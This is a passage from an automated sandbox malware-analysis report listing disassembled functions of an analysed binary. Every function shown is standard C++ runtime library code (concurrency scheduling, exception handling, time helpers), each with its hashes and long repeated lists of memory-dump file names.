Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 18672f31b438cb1fbdf8a43f64e6892a6ba09f096413504940c645fb7ea15f7f
Instruction ID: d418521b68a385beeb000fecb389156560c70f9a2eedc7cbe4bb4063ba4b2acd
Opcode Fuzzy Hash: 18672f31b438cb1fbdf8a43f64e6892a6ba09f096413504940c645fb7ea15f7f
Instruction Fuzzy Hash: 56318835A00319EFCF10DF94DA80BAE7BB9BF44304F5000AAD901AB346D7B4A905CBA5

Function 004313F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004313FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00431447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0043147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0043152A

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 2239aa853bfecadff8e07fa5e1a1078e488f64c7c49d1569009b16c376a0dbc7
Instruction ID: 2c1c6394bad657f7c7461a769e5481a7fca310a92004f219b2be54b756da1658
Opcode Fuzzy Hash: 2239aa853bfecadff8e07fa5e1a1078e488f64c7c49d1569009b16c376a0dbc7
Instruction Fuzzy Hash: C431A3B1E006159BCF04DFA9C4919EEFBB1BF48714F54922EE416A7391CB38AD41CB98

Function 0041BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0041BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0041BBE4
_xtime_get.LIBCPMT ref: 0041BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0041BC13

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
Instruction ID: 8ea58e001adf984e7c012f60bfadf62abbd4b5fd5d949d96f5012e2c2c88c0a4
Opcode Fuzzy Hash: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
Instruction Fuzzy Hash: 08216275A00219AFDF00EFA5CC819FEB7B9EF08714F10006AF601B7291DB389D419BA5

Function 00429C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00429C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429CE8
std::bad_exception::bad_exception.LIBCMT ref: 00429CFE
std::bad_exception::bad_exception.LIBCMT ref: 00429D6A

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 5e256f9b301b3cfc6e0eb83756319a69c5cb5deef56b7021be32dc7cad24a236
Instruction ID: e4f0000fdf8db68e5cd6af660122ebbf79e84cae44bb9f1680ea774d3ebdc29a
Opcode Fuzzy Hash: 5e256f9b301b3cfc6e0eb83756319a69c5cb5deef56b7021be32dc7cad24a236
Instruction Fuzzy Hash: 7F21C471A001249FCB04EF65E4829DEB7B0AF05314FA0406BF401AB2A2DB396D45DB69

Function 0042A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A069

Part of subcall function 0042B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B5AF

Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A0CB

Part of subcall function 0042AB41: List.LIBCONCRT ref: 0042AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A0DB

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
String ID:
API String ID: 932774601-0
Opcode ID: bd1b6fdc49909b2dcf111ba2607fcabc8c9d291a3a91bc692127cf55e9a86242
Instruction ID: 6a2e6f9615fc17755d550f7077966b7c4cabb78da1289db06186b5d66059c747
Opcode Fuzzy Hash: bd1b6fdc49909b2dcf111ba2607fcabc8c9d291a3a91bc692127cf55e9a86242
Instruction Fuzzy Hash: A621F431600B249FCB24EF65E9908ABF3F5FF48304740455EE942A7651CB38F805CBAA

Function 00424885 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00424893
ListArray.LIBCONCRT ref: 004248A5

Part of subcall function 00425555: _InternalDeleteHelper.LIBCONCRT ref: 00425564

ListArray.LIBCONCRT ref: 004248AF
_InternalDeleteHelper.LIBCONCRT ref: 004248C8

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
